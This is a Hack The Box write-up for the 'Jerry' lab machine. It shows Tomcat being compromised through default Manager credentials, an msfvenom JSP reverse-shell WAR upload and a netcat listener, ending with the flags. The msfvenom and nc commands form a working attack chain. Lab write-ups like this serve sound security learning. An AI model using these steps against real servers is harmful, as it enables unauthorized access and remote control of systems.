Hack The Box - Jerry Walkthrough


HackTheBox Jerry Scope



Let’s do a port scan to find if there are any services running.

nmap -sC -sV -oA nmap/initial -vvv 
HackTheBox Jerry nmap scan

We found Apache Tomcat with http is running on port 8080, so let’s check what is being served at

HackTheBox Jerry - Landing web page

Manager App looks interesting. Upon clicking on it, we are greeted with a login prompt.

HackTheBox Jerry - Web login

Upon clicking cancel, we are greeted with an example of default credentials for Tomcat.

HackTheBox Jerry - Web 401 Error

If we put those credentials into the login prompt from earlier, we reach the console page.

HackTheBox Jerry - Tomcat Manager App

We see a place upload a file, so let’s use msfvenom to generate a payload to get reverse shell

msfvenom -p java/jsp_shell_reverse_tcp LHOST= LPORT=44 -f war > shelle0.war
HackTheBox Jerry - msfvenon reverse shell payload

Next we upload the payload and go to

HackTheBox Jerry - Tomcat Manager App with msfvenom reverse shell payload uploaded

Then we use netcat to listen on port 44 get shell.

nc -l -v -p 44
HackTheBox Jerry - reverse shell with netcat

With some poking around, we find some logins for Tomcat

HackTheBox Jerry - Tomcat Users Credentials

Now if we navigate to the desktop of the Administrator account, we find the flags.

HackTheBox Jerry - Flags



Here is a list of resources I used at some point while working on Jerry: